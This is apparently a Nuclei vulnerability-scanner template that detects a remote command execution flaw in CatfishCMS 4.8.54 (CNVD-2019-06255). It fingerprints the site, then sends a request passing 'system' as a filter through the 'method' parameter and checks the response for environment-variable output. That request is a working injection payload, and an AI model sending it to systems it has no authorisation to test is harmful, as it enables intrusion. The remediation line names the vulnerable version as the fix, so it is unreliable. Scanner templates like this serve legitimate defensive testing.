id: CNVD-2019-06255 info: name: CatfishCMS - Remote Command Execution author: Lark-Lab severity: critical description: | CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter. remediation: Upgrade to CatfishCMS version 4.8.54 or later. reference: - https://its401.com/article/yun2diao/91344725 - https://github.com/xwlrbh/Catfish/issues/4 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 2 tags: cnvd,cnvd2019,rce,catfishcms flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: word internal: true words: - 'content="Catfish CMS' - method: GET path: - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" matchers-condition: and matchers: - type: word words: - 'OS' - 'PATH' - 'SHELL' - 'USER' condition: and - type: status status: - 200 # digest: 4a0a00473045022006fbcd11636dfc6b0b78088e94cfe495bc28c0d9eaa663e0ef65303287ed924a022100cb422c04283414be90778be5b8712e505251da233859464e47659f678fb14826:922c64590222798bb761d5b6d8e72950